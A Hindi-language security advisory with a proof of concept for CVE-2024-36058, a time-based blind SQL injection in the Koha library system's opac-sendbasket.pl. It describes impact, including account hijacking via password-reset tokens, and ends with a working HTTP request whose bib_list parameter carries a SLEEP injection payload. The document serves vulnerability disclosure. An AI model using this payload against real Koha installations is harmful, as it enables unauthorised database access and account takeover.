
# CVE-2024-36058 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट और एडवाइजरी यह Koha लाइब्रेरी सॉफ्टवेयर के opac-sendbasket.pl में एक समय-आधारित ब्लाइंड SQL इंजेक्शन है, जो प्रमाणित डेटाबेस एन्यूमरेशन को सक्षम बनाता है।
CVE ID: CVE-2024-36058
उत्पाद: Koha लाइब्रेरी सॉफ्टवेयर
भेद्यता प्रकार: समय-आधारित ब्लाइंड SQL इंजेक्शन (CWE-89)
CVSS स्कोर: 8.1 (उच्च) प्रमाणित
प्रभावित संस्करण: 22.05.22 से नीचे
क्रेडिट: Karolis Narvilas
Koha एक ओपन-सोर्स एकीकृत लाइब्रेरी प्रणाली है। "Send Basket" कार्यक्षमता में opac/opac-sendbasket.pl पर एक समय-आधारित ब्लाइंड SQL इंजेक्शन भेद्यता मौजूद है। bib_list पैरामीटर को बिना सैनिटाइज़ किए SQL क्वेरी में पास किया जाता है, जिससे एक हमलावर मनमाना SQL पेलोड इंजेक्ट कर सकता है जो सर्वर की प्रतिक्रिया में मापने योग्य देरी उत्पन्न करता है।
एक सामान्य (निम्न-विशेषाधिकार) लाइब्रेरी उपयोगकर्ता बिना किसी उन्नत अनुमति के इस भेद्यता का शोषण कर सकता है। प्रतिक्रिया समय में अंतर का लाभ उठाकर, एक हमलावर डेटाबेस की गणना कर सकता है और उस सामग्री को पुनः प्राप्त कर सकता है जो विशेषाधिकार प्राप्त पहुंच तक सीमित होनी चाहिए।
प्रभाव: एक दूरस्थ प्रमाणित हमलावर संवेदनशील डेटाबेस सामग्री की गणना करने के लिए CVE-2024-36058 का शोषण कर सकता है, जिसमें पासवर्ड रीसेट प्रवाह का शोषण करना और अन्य उपयोगकर्ता खातों के पासवर्ड रीसेट टोकन प्राप्त करके उन्हें हाईजैक करना शामिल है, जिससे अनधिकृत पहुंच और संभावित डेटा एक्सपोज़र हो सकता है।

bib_list पैरामीटर में पेलोड इंजेक्ट करें:अनुरोध:
POST /cgi-bin/koha/opac-sendbasket.pl HTTP/1.1
Host: {domain}
Cookie: [Low Privilege Session]
-- SNIP --
email_add=<recipient>&comment=x&bib_list=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(36)))x)--+-&csrf_token=<csrf_token>
